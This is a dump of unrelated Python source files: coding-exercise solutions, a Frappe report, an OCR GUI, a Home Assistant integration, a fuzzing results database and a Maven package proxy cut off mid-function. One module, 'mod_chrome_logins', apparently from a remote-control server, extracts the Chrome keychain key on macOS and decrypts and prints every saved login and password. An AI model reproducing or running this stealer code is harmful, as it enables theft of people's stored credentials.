content
stringlengths 5
1.05M
|
---|
import sys
class Solution:
def diameterOfBinaryTree(self, root: TreeNode) -> int:
self.curMax = 0
self.postOrder(root)
return self.curMax
def postOrder(self, root: TreeNode) -> int:
if not root:
return 0
left = self.postOrder(root.left)
right = self.postOrder(root.right)
self.curMax = max(self.curMax, left+right)
return max(left, right)+1 |
# Marcelo Campos de Medeiros
# ADS UNIFIP 2020.1
# 3 Lista
# Patos-PB maio/2020
'''
Escreva um programa que leia 2 valores X e Y e que imprima todos os valores entre eles cujo resto da
divisão dele por 5 for igual a 2 ou igual a 3.
Entrada
O arquivo de entrada contém 2 valores positivos inteiros quaisquer, não necessariamente em ordem crescente.
Saída
Imprima todos os valores conforme exemplo abaixo, sempre em ordem crescente.
Sample Input Sample Output
10 12
18 13
17
'''
#leia 2 valores X e Y
x = int(input())
y = int(input())
# condição de qual número é o menor, assim ele passa ser "a" e o maior "b"
if x > y:
a = y
b = x
# condição de qual número é o menor, assim ele passa ser "a" e o maior "b"
if x <= y:
a = x
b = y
a = a + 1
# laço entre que vai do menor "a" até maior "b"
while a < b:
# condição p imprimir divisão dele por 5 == 2 ou == 3
if a % 5 == 2 or a % 5 == 3:
print(a)
a = a + 1
|
import frappe
from frappe.utils import time_diff_in_hours
def get_tat_for_closed_ticket(start, end):
filters = [
["Request", "start_date", ">=", start],
["Request", "start_date", "<=", end],
["Request", "end_date", ">=", start],
["Request", "end_date", "<=", end],
["Request", "request_status","=","Close"]
]
fields = [
"end_date",
"start_date",
"department_abbriviation"
]
try:
results = frappe.get_all("Request", fields=fields, filters=filters)
return prepare_data(results)
except Exception, e:
return None
def get_leagend(start, end):
time_diff = time_diff_in_hours(end, start)
if time_diff <= 24.0:
return "Winthin 1 day"
elif time_diff <= 72.0:
return "2-3 days"
elif time_diff <= 120.0:
return "3-5 days"
elif time_diff <= 168.0:
return "5-7 days"
else:
return "more than 7 days"
def prepare_data(results):
"""results = [{
'department_abbriviation': u'ACC',
'end_date': datetime.datetime(2016, 2, 10, 15, 27, 46),
'start_date': datetime.datetime(2016, 2, 10, 14, 38, 7, 34947)
}]"""
if not results:
return None
data = []
requests = {}
total_tickets = 0
within_day = 0
two_three_days = 0
three_five_days = 0
five_seven_days = 0
more_than_seven = 0
for record in results:
dept = record.get("department_abbriviation")
closed_in = get_leagend(record.get("start_date"), record.get("end_date"))
count = 1
if requests.get(dept):
rec = requests.get(dept)
count = rec.get(closed_in) + 1 if rec.get(closed_in) else 1
requests.get(dept).update({ closed_in:count })
else:
requests.update({ dept: { closed_in:count } })
total_tickets += count
if closed_in == "Winthin 1 day":
within_day += count
elif closed_in == "2-3 days":
two_three_days += count
elif closed_in == "3-5 days":
three_five_days += count
elif closed_in == "5-7 days":
five_seven_days += count
else:
more_than_seven += count
data = [["Genre", "Winthin 1 day", "2-3 days", "3-5 days", "5-7 days", "more than 7 days", { "role": "annotation" }]]
chart_data = [[key, request.get("Winthin 1 day") or 0, request.get("2-3 days") or 0, request.get("3-5 days") or 0, \
request.get("5-7 days") or 0, request.get("more than 7 days") or 0, ""] for key, request in requests.iteritems()]
data.extend(chart_data)
data.append(["Total", within_day, two_three_days, three_five_days, five_seven_days, more_than_seven, ""])
return {
"requests": data,
"table": list(zip(*data)),
} |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
editor: Aldrich
version: 21.121_released
description: A tool that can import a picture to convenient text.
"""
# Copyright 2021 (C) Aldrich | All Rights Reserved.
# Please download the model files and move them to "C://Users//YourName//.EasyOCR" use before.
# If your computer have CUDA, that'll dispose more faster.
# Main Libraries
from tkinter import *
import easyocr
# Other Libraries
import tkinter.messagebox
import tkinter.ttk
import pyperclip
import shutil
import windnd
import os
def file_message(files): # Process
filename = ''.join((item.decode('gbk') for item in files)) # Process file path
message = ('确认您的文件为:', filename)
make_sure = tkinter.messagebox.askquestion('提示', message) # Confirm file path
if make_sure:
if filename.endswith(('jpg', 'png', 'jpeg', 'bmp')): # Check the file
if os.getcwd() in filename:
n_filename = filename.replace(os.getcwd(), '')[1:]
else:
ex = os.path.splitext(filename)[1]
shutil.copyfile(filename, rf'temp{ex}')
n_filename = rf'temp{ex}'
ocr_main(n_filename) # Pass parameters to run the function
else:
tkinter.messagebox.showerror('错误', '不支持此格式!')
else:
pass
def ocr_main(files): # Text recognition and display
reader = easyocr.Reader(['ch_sim', 'en'])
result = reader.readtext(f'{files}', detail=0) # Writes the picture to memory
def copy_all():
pyperclip.copy(''.join(result))
window.geometry('635x300+500+300')
window.resizable(True, True)
label.grid_remove()
btn1 = tkinter.Button(window, text='复制全部', font=('微软雅黑', 12), command=copy_all, width=10)
btn1.grid(row=2, column=0, sticky=tkinter.W)
lis = tkinter.Listbox(window, font=('微软雅黑', 12), width=70, height=11)
lis.grid(row=1, columnspan=3, sticky=tkinter.W)
list_num = 0
n_list_num = len(result) + 1
lis.delete(0, tkinter.END)
while True:
if list_num == n_list_num:
break
else:
pass
lis.insert(list_num, result[list_num])
list_num = list_num + 1
window = Tk()
window.title('OCR图片转文字工具')
window.geometry('300x300')
window.resizable(0, 0)
windnd.hook_dropfiles(window, func=file_message)
label = tkinter.Label(window, text='\n\n\n\n\n请将图片拖入此处\n(图片格式:.png、.jpg、.jpeg、.bmp)', font=('微软雅黑', 12))
label.grid(row=0, column=0, sticky=tkinter.W)
window.mainloop()
|
import time
def wait_pipe_len(sock, expected, timeout=10):
"""
Wait up to ``timeout`` seconds for the length of sock.pipes to become
``expected`` value. This prevents hardcoding sleep times, which should be
pretty small for local development but potentially pretty large for CI
runs.
"""
now = time.time()
later = now + timeout
while time.time() < later and len(sock.pipes) != expected:
time.sleep(0.002)
return len(sock.pipes) == expected
|
import os
from datetime import datetime
from urllib.request import urlretrieve
from zipfile import ZipFile
from ndj_toolbox.fetch import (xml_df_internal, save_files)
url_base = 'http://www.al.sp.gov.br/repositorioDados/'
url_file = 'processo_legislativo/documento_regime.zip'
url = url_base + url_file
def main():
hoje = datetime.strftime(datetime.now(), '%Y-%m-%d')
DATA_DIR = f'data_{hoje}'
urlretrieve(url, f'{DATA_DIR}/documento_regime.zip')
zip_file = ZipFile(f'{DATA_DIR}/documento_regime.zip', 'r')
zip_file.extractall(f'{DATA_DIR}')
zip_file.close()
os.remove(f'{DATA_DIR}/documento_regime.zip')
xml_data = f'{DATA_DIR}/documento_regime.xml'
dataset = xml_df_internal(xml_data).process_data()
dataset = dataset[[
'IdDocumento', 'IdRegime', 'NomeRegime', 'DataInicio', 'DataFim'
]]
dataset = dataset.rename(columns={
'IdDocumento': 'id_documento',
'IdRegime': 'id_regime',
'NomeRegime': 'nm_regime',
'DataInicio': 'dt_inicio',
'DataFim': 'dt_fim'
})
save_files(dataset, 'documentos_regimes_tramitacao')
os.remove(xml_data)
if __name__ == '__main__':
main()
|
"""
This component is an upgraded version of file sensor.
It has the same characteristics but it:
- expect a vecotr of data read from file in order to be able to interpret it.
- vector lenght is dependant to information of setup.
- It has an additional property that return the whole vector read.
"""
import os
import logging
import asyncio
from homeassistant import config_entries
from homeassistant.config_entries import (
SOURCE_IMPORT,
ConfigEntry
)
from homeassistant.helpers import discovery
from homeassistant.util import Throttle
from .sensor import FileSensor
from .const import (
VERSION,
DOMAIN,
PLATFORM,
ISSUE_URL,
CONFIGFLOW_VERSION
)
_LOGGER = logging.getLogger(__name__)
async def async_setup(hass, config):
_LOGGER.info("Set up of integration %s, version %s, in case of issue open ticket at %s", DOMAIN, VERSION, ISSUE_URL)
return True
async def async_setup_entry(hass, config_entry):
"""Set up this integration using UI."""
if config_entry.source == config_entries.SOURCE_IMPORT:
# We get here if the integration is set up using YAML
hass.async_create_task(hass.config_entries.async_remove(config_entry.entry_id))
return True
undo_listener = config_entry.add_update_listener(update_listener)
_LOGGER.info("Added new FileRestore entity, entry_id: %s", config_entry.entry_id)
hass.async_create_task(hass.config_entries.async_forward_entry_setup(config_entry, PLATFORM))
return True
async def async_unload_entry(hass, config_entry):
"""Unload a config entry."""
_LOGGER.debug("async_unload_entry: %s", config_entry)
await asyncio.gather(hass.config_entries.async_forward_entry_unload(config_entry, PLATFORM))
return True
async def update_listener(hass, config_entry):
"""Handle options update."""
_LOGGER.debug("update_listener: %s", config_entry)
await hass.config_entries.async_reload(config_entry.entry_id)
async def async_migrate_entry(hass, config_entry: ConfigEntry):
"""Migrate old entry."""
_LOGGER.debug("Migrating from version %s to version %s", config_entry.version, CONFIGFLOW_VERSION)
new_data = {**config_entry.data}
new_options = {**config_entry.options}
if config_entry.version == 1:
config_entry.unique_id = config_entry.data["unique_id"]
del new_data["unique_id"]
config_entry.version = CONFIGFLOW_VERSION
config_entry.data = {**new_data}
_LOGGER.info("Migration of entry %s done to version %s", config_entry.title, config_entry.version)
return True
_LOGGER.info("Migration not required")
return True
|
# -*- coding: utf-8 -*-
def main():
from itertools import permutations
import sys
input = sys.stdin.readline
s1 = list(input().rstrip())
s2 = list(input().rstrip())
s3 = list(input().rstrip())
s = set(s1) | set(s2) | set(s3)
if len(s) > 10:
print("UNSOLVABLE")
exit()
n = len(s)
for p in permutations(range(10), r=n):
d = dict()
for index, si in enumerate(s):
d[si] = str(p[index])
n1, n2, n3 = "", "", ""
for s1i in s1:
n1 += d[s1i]
for s2i in s2:
n2 += d[s2i]
for s3i in s3:
n3 += d[s3i]
if n1[0] == "0" or n2[0] == "0" or n3[0] == "0":
continue
if int(n1) + int(n2) == int(n3):
print("\n".join(map(str, [n1, n2, n3])))
exit()
print("UNSOLVABLE")
if __name__ == "__main__":
main()
|
"""
# Definition for a Node.
class Node(object):
def __init__(self, val, children):
self.val = val
self.children = children
"""
class Solution(object):
def levelOrder(self, root):
"""
:type root: Node
:rtype: List[List[int]]
"""
if root is None:
return []
openlist = [root]
res = [[root.val]]
while len(openlist)>0:
n = len(openlist)
next_lvl = []
for i in range(n):
node = openlist[i]
for child in node.children:
if child is not None:
openlist.append(child)
next_lvl.append(child.val)
openlist = openlist[n:]
if len(next_lvl)>0:
res.append(next_lvl)
return res |
"""
MIT License Block
Copyright (c) 2015 Alex Barry
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import sys
import logging
import csv
import os
from ..Utils import select_files_in_folder, touch
# Populate the Base Message Global Variable
def build_msg(msg_path):
#Open the base message File
msg = None
try:
with open(msg_path, 'r') as f:
msg = f.read()
logging.debug("Base Message file opened")
except Exception as e:
logging.error('Exception during read of base message')
logging.error(e)
return msg
# Build a message list from a CSV
def build_msg_list_from_csv(msg, config_csv, csv_var_start, csv_var_end):
logging.debug("Building message list from base message and csv")
message_list = []
#Open the CSV File and start building Message Files
csvfile = None
if sys.version_info[0] < 3:
csvfile = open(config_csv, 'rb')
else:
csvfile = open(config_csv, 'r')
logging.debug('CSV File Opened')
reader = csv.reader(csvfile, delimiter=',', quotechar='|')
if sys.version_info[0] < 3:
header_row = reader.next()
else:
header_row = reader.__next__()
header_dict = {}
logging.debug("Header row retrieved")
for row in reader:
repl_dict = {}
for i in range(0, len(row)):
logging.debug("Processing CSV Element: %s" % row[i])
new_dict_key = "%s%s%s" % (csv_var_start, header_row[i], csv_var_end)
repl_dict[new_dict_key] = row[i]
message_list.append(replace_variables(msg, repl_dict))
return message_list
# Replace a a set of variables within a message
# base_text - The message contianing variables
# variable_dict - A dictionary of variable names & values
def replace_variables(msg, variable_dict):
# The dict uses different functions to return list generators of key/value pairs in 2.x vs 3.x
# So, we use the sys module to detect at run time and use the correct method
if sys.version_info[0] < 3:
for key, val in variable_dict.iteritems():
logging.debug("Replacing Variable %s with Value %s" % (key, val))
msg = msg.replace(key, val)
else:
for key, val in variable_dict.items():
logging.debug("Replacing Variable %s with Value %s" % (key, val))
msg = msg.replace(key, val)
return msg
# Pass in a Session as input and output a session that has been updated
def generate_msg_list(session):
#Now, we need to determine how many messages we're sending and build them
if session['single_message']:
logging.debug("Building Single Message")
session.num_msg=1
session.base_msg = build_msg( os.path.abspath(session['msg_location']) )
session.msg_list.append( session.base_msg )
elif session['multi_message'] and session['include_csv']:
logging.debug("Building Messages from CSV")
#Pull the correct file paths
msg_path = os.path.abspath(session['msg_location'])
config_csv = os.path.abspath(session['csv_location'])
session.base_msg = build_msg(msg_path)
logging.debug("Base Message: %s" % session.base_msg)
#Read the CSV, Build the message list, and take it's length for num_msg
session.msg_list = build_msg_list_from_csv(session.base_msg, config_csv, session['csv_var_start'], session['csv_var_end'])
session.num_msg=len(session.msg_list)
elif session['multi_message']:
logging.debug("Building Messages from Folder")
msg_folder = select_files_in_folder(os.path.abspath(session['msg_folder_location']), session['msg_extension'])
#Build the message list
for path in msg_folder:
session.msg_list.append( build_msg(os.path.abspath(path)) )
session.num_msg = len(session.msg_list)
return session
|
import os
from os.path import expanduser
import base64
import binascii
import hmac
import itertools
import operator
import shutil
import sqlite3
import struct
import subprocess
import hashlib
from apps.server.modules.mod_interface import mod_interface
try:
xrange
except NameError:
# Python3 support.
# noinspection PyShadowingBuiltins
xrange = range
class mod_chrome_logins(mod_interface):
def setup_mod(self):
print(f'Module Setup (mod_chrome_logins) called successfully!')
def pbkdf2_bin(self, password, salt, iterations, keylen=16):
# Thanks to mitsuhiko for this function:
# https://github.com/mitsuhiko/python-pbkdf2
_pack_int = struct.Struct('>I').pack
hashfunc = sha1
mac = hmac.new(password, None, hashfunc)
def _pseudorandom(x, mac=mac):
h = mac.copy()
h.update(x)
return map(ord, h.digest())
buf = []
for block in xrange(1, -(-keylen // mac.digest_size) + 1):
rv = u = _pseudorandom(salt + _pack_int(block))
for i in xrange(iterations - 1):
u = _pseudorandom(''.join(map(chr, u)))
rv = itertools.starmap(operator.xor, itertools.izip(rv, u))
buf.extend(rv)
return ''.join(map(chr, buf))[:keylen]
try:
from hashlib import pbkdf2_hmac
except ImportError:
# Python version not available (Python < 2.7.8, macOS < 10.11),
# use mitsuhiko's pbkdf2 method.
pbkdf2_hmac = pbkdf2_bin
from hashlib import sha1
def chrome_decrypt(self, encrypted, safe_storage_key):
"""
AES decryption using the PBKDF2 key and 16x " " IV
via openSSL (installed on OSX natively)
Salt, iterations, iv, size:
https://cs.chromium.org/chromium/src/components/os_crypt/os_crypt_mac.mm
"""
iv = "".join(("20",) * 16)
key = hashlib.pbkdf2_hmac("sha1", safe_storage_key, b"saltysalt", 1003)[:16]
hex_key = binascii.hexlify(key)
hex_enc_password = base64.b64encode(encrypted[3:])
# Send any error messages to /dev/null to prevent screen bloating up
# (any decryption errors will give a non-zero exit, causing exception)
try:
strTmp = f"openssl enc -base64 -d -aes-128-cbc -iv '{iv}' -K '{hex_key}' <<< '{hex_enc_password}' 2>/dev/null"
strTmp = strTmp.replace("'b'", "'")
strTmp = strTmp.replace("''", "'")
decrypted = subprocess.check_output(
strTmp,
shell=True)
except subprocess.CalledProcessError:
decrypted = "Error decrypting this data."
return decrypted
def run_mod(self, cmd = ""):
safe_storage_key = subprocess.Popen(
"security find-generic-password -wa "
"'Chrome'",
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
stdout, stderr = safe_storage_key.communicate()
if stderr:
print("Error: {}. Chrome entry not found in keychain?".format(stderr))
elif not stdout:
print("User clicked deny.")
else:
safe_storage_key = stdout[:-1]
shutil.copy2(expanduser("~") + '/Library/Application Support/Google/Chrome/Default/Login Data', 'chrome_logins')
con = sqlite3.connect('chrome_logins')
cur = con.cursor()
query_result = cur.execute('SELECT * FROM logins')
for row in query_result:
passwd = self.chrome_decrypt(row[5], safe_storage_key)
if(row[3] != ""):
print(f'URL: {row[0]}:')
print(f'- Action-URL: {row[1]}')
print(f'- User: {row[3]}, Paswword: {passwd}')
else:
continue
cur.close()
con.close()
os.remove('chrome_logins')
return query_result
|
# -*- coding: utf-8 -*-
"""
Filter database using Pharmacophore model.
Created on Mon Mar 16 10:11:53 2015
@author: Marta Stepniewska
"""
from pybel import readfile
from decaf import Pharmacophore
from decaf.toolkits.ob import phar_from_mol
from decaf.utils import similarity
from multiprocessing import Process, Manager, cpu_count
from time import sleep
NUM_PROCESSES = cpu_count()
cutoff = 0.8
database = readfile("smi", "all.ism")
model = Pharmacophore.read("model.p")
print "Read model with %s nodes created from %s molecules." % (model.numnodes,
model.molecules)
manager = Manager()
similar = manager.list()
proc = [None]*NUM_PROCESSES
def check_mol(mol):
p = phar_from_mol(mol)
s, c = similarity(model, p)
#print s, c
if s > cutoff:
similar.append((mol.write(), s, c))
i = 0
compared = 0
while True:
if (proc[i] is not None and not proc[i].is_alive()) or proc[i] is None:
try:
mol = database.next()
compared += 1
if compared % 10 == 0:
print compared, "molecules comapred"
proc[i] = Process(target=check_mol, args=(mol,))
proc[i].start()
except StopIteration:
break
i = (i + 1) % NUM_PROCESSES
print "All", compared, "molecules comapred."
for p in proc:
while p.is_alive():
sleep(0.1)
print "Found %s similar molecules:" % len(similar)
for s in similar:
print "SMILES:", s[0].split()[0]
print "description:", s[0].split("\t")[1].rstrip()
print "score: %s, cost: %s" % (s[1:])
print ""
|
# -*- coding: utf-8 -*-
# @Author: CodyKochmann
# @Date: 2020-04-05 11:39:37
# @Last Modified by: CodyKochmann
# @Last Modified time: 2020-04-05 12:23:59
from typing import Set, Tuple, Dict
import sqlite3, inspect, logging, unittest
'''
FuzzResult structure
{
(int, int): {
True: [
([3, 5], 8),
([1, 1], 2),
([9, 15], 24),
],
False: {}
}
(set, str): {
True: [],
False: {
(<class 'TypeError'>, ('can only concatenate str (not "set") to str',)): [
({'yolo', {2, 4, 6}})
]
}
}
}
'''
def attempt_getsource(fn):
try:
return inspect.getsource(fn)
except:
return None
class FuzzResultDB(sqlite3.Connection):
schema = [
'''
CREATE TABLE IF NOT EXISTS fuzz_tests (
id INTEGER PRIMARY KEY AUTOINCREMENT,
ts TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
target_module TEXT,
target_function_name TEXT,
target_function_repr TEXT,
target_function_source TEXT
);
''',
'''
CREATE TABLE IF NOT EXISTS test_ingest (
test_id INTEGER REFERENCES fuzz_tests(id),
successful BOOLEAN NOT NULL,
input_types TEXT NOT NULL,
input_args TEXT NOT NULL,
output_type TEXT,
output TEXT,
exception_type TEXT,
exception TEXT,
CHECK (
(
output_type != NULL AND output != NULL
) OR (
exception_type != NULL AND exception != NULL
)
)
);
'''
]
def __init__(self, fuzz_target, fuzz_result: Dict, db_path=":memory:"):
# validate input
assert callable(fuzz_target), f'FuzzResultDB assumes fuzz_target is some type of calable function - {fuzz_target}'
assert isinstance(fuzz_result, dict), f'FuzzResultDB assumes fuzz_result will be a dict - {fuzz_result}'
assert isinstance(db_path, str), f'FuzzResultDB assumes db_path will be a string - {db_path}'
# initialize sqlite3.Connection components
sqlite3.Connection.__init__(self, db_path)
# save input for potential future reference
self._db_path = db_path
self._fuzz_target = fuzz_target
self._fuzz_result = fuzz_result
# load the base schema
self.load_schema()
# save the fuzz results
self.save_results(fuzz_target, fuzz_result)
def load_schema(self):
cursor = self.cursor()
for command in FuzzResultDB.schema:
try:
list(cursor.execute(command))
except Exception as ex:
logging.exception('failed to run sql command - %', command)
raise ex
cursor.close()
@property
def test_id(self):
if not hasattr(self, '_test_id'):
cursor = self.cursor()
self._test_id = cursor.execute(
'''
INSERT INTO fuzz_tests (
target_module,
target_function_name,
target_function_repr,
target_function_source
) VALUES (?, ?, ?, ?);
''',
(
self._fuzz_target.__module__ if hasattr(self._fuzz_target, '__module__') else None,
self._fuzz_target.__name__ if hasattr(self._fuzz_target, '__name__') else None,
repr(self._fuzz_target),
attempt_getsource(self._fuzz_target)
)
).lastrowid
cursor.close()
return self._test_id
def save_results(self, fuzz_target, fuzz_result):
cursor = self.cursor()
# iterate through the FuzzResult to store its tests to the db
for type_combo, result in fuzz_result.items():
unittest.TestCase.assertEquals(unittest.TestCase(), [type(type_combo), type(result)], [tuple, dict])
assert len(result) > 0, result
assert len(result) <= 2, result
if True in result and len(result[True]) > 0: # successful tests need to be stored
list(cursor.executemany(
'''
INSERT INTO test_ingest (
test_id,
successful,
input_types,
input_args,
output_type,
output
) VALUES (?, ?, ?, ?, ?, ?);
''',
(
(
self.test_id,
True,
repr(type_combo),
repr(input_args),
repr(type(output)),
repr(output)
)
for input_args, output in result[True]
)
))
if False in result and len(result[False]) > 0: # failed tests need to be stored
list(cursor.executemany(
'''
INSERT INTO test_ingest (
test_id,
successful,
input_types,
input_args,
exception_type,
exception
) VALUES (?, ?, ?, ?, ?, ?);
''',
(
(
self.test_id,
False,
repr(type_combo),
repr(input_args),
repr(output[0]),
repr(output[1] if len(output)>1 else None)
)
for input_args, output in result[False]
)
))
cursor.close()
class FuzzResult(dict):
''' acts as a user friendly data structure to explore fuzz results '''
@property
def crash_input_types(self) -> Set[Tuple[type]]:
return {k for k,v in self.items() if len(v[False]) > 0}
@property
def crash_input_count(self) -> int:
return sum(len(v[False]) > 0 for v in self.values())
@property
def successful_input_types(self) -> Set[Tuple[type]]:
return {k for k,v in self.items() if len(v[True]) > 0}
@property
def successful_input_count(self) -> int:
return sum(len(v[True]) > 0 for v in self.values())
@property
def iffy_input_types(self) -> Set[Tuple[type]]:
return self.crash_input_types.intersection(self.successful_input_types)
@property
def iffy_input_count(self) -> int:
return sum(len(v[True]) > 0 and len(v[False]) > 0 for v in self.values())
def __str__(self) -> str:
return f'''
FuzzResult:
type_combos:
successful: {self.successful_input_count}
problematic: {self.crash_input_count}
iffy: {self.iffy_input_count}
'''.strip()
|
import os
import json
import shutil
import logging
import requests
import tempfile
from xml.etree.ElementTree import fromstring, tostring
from os.path import join, exists, basename, expanduser
from util.job_util import exec_command
from pm_proxy.pm_base import PackageManagerProxy
class MavenProxy(PackageManagerProxy):
# FIXME: maybe use curl command line to avoid being blocked (maven server blocks frequent visits)
def __init__(self, registry=None, cache_dir=None, isolate_pkg_info=False):
super(MavenProxy, self).__init__()
self.registry = registry
self.cache_dir = cache_dir
self.isolate_pkg_info = isolate_pkg_info
self.metadata_format = 'pom'
self.dep_format = 'json'
def _get_versions_info(self, pkg_name):
gid, aid = pkg_name.split('/')
try:
# Maven URL for package information
# https://repo1.maven.org/maven2/com/google/protobuf/protobuf-java/maven-metadata.xml
versions_url = "https://repo1.maven.org/maven2/%s/%s/maven-metadata.xml" % (gid.replace('.', '/'), aid)
versions_content = requests.request('GET', versions_url)
# Parsing pom files
# https://stackoverflow.com/questions/16802732/reading-maven-pom-xml-in-python
return fromstring(versions_content.text)
except:
logging.error("fail to get latest version for pkg %s!", pkg_name)
return None
def _get_latest_version(self, pkg_name):
versions_info = self._get_versions_info(pkg_name=pkg_name)
if versions_info:
return versions_info.find('./versioning/latest').text
else:
return None
def _get_sanitized_version(self, pkg_name, pkg_version):
if pkg_version is None:
return self._get_latest_version(pkg_name=pkg_name)
else:
return pkg_version
def _get_pkg_fname(self, pkg_name, pkg_version, suffix='jar'):
_, aid = pkg_name.split('/')
return '%s-%s.%s' % (aid, pkg_version, suffix)
def _get_pkg_dir(self, pkg_name, pkg_version):
gid, aid = pkg_name.split('/')
return '%s/%s/%s' % (gid.replace('.', '/'), aid, pkg_version)
def _get_pkg_path(self, pkg_name, pkg_version, suffix='jar'):
return '%s/%s' % (self._get_pkg_dir(pkg_name=pkg_name, pkg_version=pkg_version),
self._get_pkg_fname(pkg_name=pkg_name, pkg_version=pkg_version, suffix=suffix))
def download(self, pkg_name, pkg_version=None, outdir=None, binary=False, with_dep=False):
# mvn dependency:get -Dartifact=com.google.protobuf:protobuf-java:3.5.1 -Dtransitive=false -Ddest=/tmp/
pkg_version = self._get_sanitized_version(pkg_name=pkg_name, pkg_version=pkg_version)
if binary:
logging.warning("support for binary downloading is not added yet!")
if with_dep:
logging.warning("support for packing dependencies is not added yet!")
possible_extensions = ('jar', 'aar', 'war')
for extension in possible_extensions:
# /tmp/protobuf-java-3.5.1.jar
if extension != 'jar':
download_artifact = '%s:%s:%s' % (pkg_name.replace('/', ':'), pkg_version, extension)
else:
download_artifact = '%s:%s' % (pkg_name.replace('/', ':'), pkg_version)
download_cmd = ['mvn', 'dependency:get',
'-Dartifact=%s' % download_artifact, '-Dtransitive=false', '-Ddest=%s' % outdir]
exec_command('mvn dependency:get', download_cmd)
# cleanup intermediate folders
temp_install_path = expanduser(join('~/.m2/repository', self._get_pkg_dir(pkg_name=pkg_name, pkg_version=pkg_version)))
shutil.rmtree(temp_install_path)
# check if download path exists to see if the download is successful or not
download_path = join(outdir, self._get_pkg_fname(pkg_name=pkg_name, pkg_version=pkg_version, suffix=extension))
if exists(download_path):
return download_path
logging.error("failed to download pkg %s ver %s", pkg_name, pkg_version)
return None
def install(self, pkg_name, pkg_version=None, trace=False, trace_string_size=1024, install_dir=None, outdir=None,
sudo=False):
# mvn dependency:get -Dartifact=com.google.protobuf:protobuf-java:3.5.1
install_cmd = ['mvn', 'dependency:get', '-Dartifact=%s:%s' % (
pkg_name.replace('/', ':'), self._get_sanitized_version(pkg_name=pkg_name, pkg_version=pkg_version))]
install_cmd = self.decorate_strace(pkg_name=pkg_name, pkg_version=pkg_version, trace=trace,
trace_string_size=trace_string_size, sudo=sudo, outdir=outdir,
command=install_cmd)
# ~/.m2/repository/com/google/protobuf/protobuf-java/3.5.1/protobuf-java-3.5.1.jar
exec_command('mvn install', install_cmd)
def install_file(self, infile, trace=False, trace_string_size=1024, sudo=False, install_dir=None, outdir=None):
# FIXME: add install using local jar file
# mvn install -Dxxxxx
logging.error("suport for install_file is not added yet!")
def uninstall(self, pkg_name, pkg_version=None, trace=False, trace_string_size=1024, sudo=False, install_dir=None,
outdir=None):
# simply remove the corresponding folder
# https://stackoverflow.com/questions/15358851/how-to-remove-jar-file-from-local-maven-repository-which-was-added-with-install/15358921
install_path = expanduser(join('~/.m2/repository', self._get_pkg_dir(
pkg_name=pkg_name, pkg_version=self._get_sanitized_version(pkg_name=pkg_name, pkg_version=pkg_version))))
shutil.rmtree(install_path)
def get_metadata(self, pkg_name, pkg_version=None):
# load cached metadata information
pkg_info_dir = self.get_pkg_info_dir(pkg_name=pkg_name)
if pkg_info_dir is not None:
metadata_fname = self.get_metadata_fname(pkg_name=pkg_name, pkg_version=pkg_version,
fmt=self.metadata_format)
metadata_file = join(pkg_info_dir, metadata_fname)
if exists(metadata_file):
logging.warning("get_metadata: using cached metadata_file %s!", metadata_file)
if self.metadata_format == 'pom':
return fromstring(open(metadata_file, 'r').read())
else:
logging.error("get_metadata: output format %s is not supported!", self.metadata_format)
return None
# Maven metadata is loaded in two steps.
# First, load names and versions. Then load the latest/specified version
try:
# Maven URL for specific version
# https://repo1.maven.org/maven2/com/google/protobuf/protobuf-java/3.6.1/protobuf-java-3.6.1.pom
# NOTE: don't re-assign variable pkg_version here, since it is used to generated file name later.
metadata_url = "https://repo1.maven.org/maven2/%s" % self._get_pkg_path(
pkg_name=pkg_name, pkg_version=self._get_sanitized_version(pkg_name=pkg_name, pkg_version=pkg_version),
suffix="pom")
metadata_content = requests.request('GET', metadata_url)
pkg_info = fromstring(metadata_content.text)
except Exception as e:
logging.error("fail in get_metadata for pkg %s: %s, ignoring!", pkg_name, str(e))
return None
if pkg_info_dir is not None:
if not exists(pkg_info_dir):
os.makedirs(pkg_info_dir)
metadata_fname = self.get_metadata_fname(pkg_name=pkg_name, pkg_version=pkg_version,
fmt=self.metadata_format)
metadata_file = join(pkg_info_dir, metadata_fname)
if self.metadata_format == 'pom':
open(metadata_file, 'w').write(metadata_content.text)
else:
logging.error("get_metadata: output format %s is not supported!", self.metadata_format)
return pkg_info
def get_versions(self, pkg_name, max_num=15, min_gap_days=30, with_time=False):
# FIXME: the max_num and min_gap_days are not checked and enforced!
# https://repo1.maven.org/maven2/com/google/protobuf/protobuf-java/maven-metadata.xml
versions_info = self._get_versions_info(pkg_name=pkg_name)
if versions_info is None:
logging.error("fail to get versions_info for %s", pkg_name)
return []
versions = [ver.text for ver in versions_info.findall('./versioning/versions/version')]
# NOTE: this is similar to filter_versions, except that no date information.
if len(versions) <= max_num:
return versions
versions = filter(lambda k: k.strip('v').replace('.', '').isdigit(), versions)
if len(versions) == 0:
return []
if max_num <= 0:
return versions
else:
return sorted(versions, key=lambda version: map(lambda digit: int(digit) if digit else 0, version.strip('v').split('.')), reverse=True)[:max_num]
def get_author(self, pkg_name):
pkg_info = self.get_metadata(pkg_name=pkg_name)
if pkg_info is None:
return {}
groupid = pkg_name.split('/')[0]
# developers
# e.g. org.clojure..tools.logging, org.twitter4j..twitter4j
# https://stackoverflow.com/questions/16802732/reading-maven-pom-xml-in-python
nsmap = {'m': 'http://maven.apache.org/POM/4.0.0'}
devs = pkg_info.findall('.//m:developer', nsmap)
developers = []
for dev in devs:
dev_info = {}
dev_id = dev.find('m:id', nsmap)
if dev_id is not None:
dev_info['id'] = dev_id.text
dev_name = dev.find('m:name', nsmap)
if dev_name is not None:
dev_info['name'] = dev_name.text
dev_email = dev.find('m:email', nsmap)
